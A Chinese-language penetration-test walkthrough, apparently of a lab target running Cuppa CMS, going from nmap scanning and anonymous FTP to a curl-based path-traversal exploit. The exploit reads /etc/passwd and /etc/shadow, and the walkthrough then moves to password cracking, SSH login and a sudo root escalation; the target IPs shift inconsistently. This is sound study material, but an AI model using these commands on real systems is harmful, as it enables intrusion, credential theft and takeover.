文章目录
一、主机发现
二、服务探测
三、挖掘漏洞
ftp渗透
Mysql登录
Web渗透
四、提权
一、主机发现
Kali IP:192.168.78.128
靶机IP:192.168.78.184
nmap -sP 192.168.78.0/24
二、服务探测
端口探测
nmap -sT -sV -p- 192.168.78.184
漏洞探测
nmap -script=vuln -p21,22,80,3306 192.168.78.184
获取到wordpress框架信息,以及ftp匿名登录信息,这里没显示出来
目录文件探测
dirsearch -u http://192.168.78.184
dirb http://192.168.78.184
查找出该页面存在administrator目录:http://192.168.78.184/administrator/installation/
发现是Title[Cuppa CMS]框架!CuppaCMS是一套内容管理系统(CMS)!
三、挖掘漏洞
ftp渗透
ftp 192.168.203.138
输入后进入匿名登录,匿名登录的账号都是anonymous,密码为空,直接回车
下载里面的文件
mget *.txt
Md5和base64解密后没利用价值
有一串颠倒的字符和人员信息,颠倒字符解密网站:https://www.upsidedowntext.com/
字符解密后也没有利用价值,继续看其他服务
Mysql登录
mysql -h 192.168.203.138 -u root -p
显示不允许登录连接
Web渗透
前面我们知道了网站存在CuppaCMS,在kali搜索一下是否有漏洞信息
searchsploit cuppa cms
Copy到根目录查看一下
这里需要改一下路径
http://192.168.78.184/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
但是没显示
翻阅代码知道:它是用post的方式来处理传过来的参数的,并且没有做任何处理。
使用curl,对数据进行url编码,并且通过post的方式进行传递,这里省略详细过程。(看的wp)
curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.78.184/administrator/alerts/alertConfigField.php
成功显示,继续看一下shadow文件
curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.78.184/administrator/alerts/alertConfigField.php
将有密码的行保存下来去破解
首先破解了这两个www-data , w1r3s账户,试试w1r3s的相关权限
ssh w1r3s@192.168.78.184
四、提权
尝试sudo提权:Sudo -l
我们发现用户有三个ALL权限,意味着基本等于root用户了。
那我们启动一个新的bash会话,新建一个sh文件
echo '/bin/bash' >> root.sh
chmod +x root.sh
sudo ./root.sh
提权成功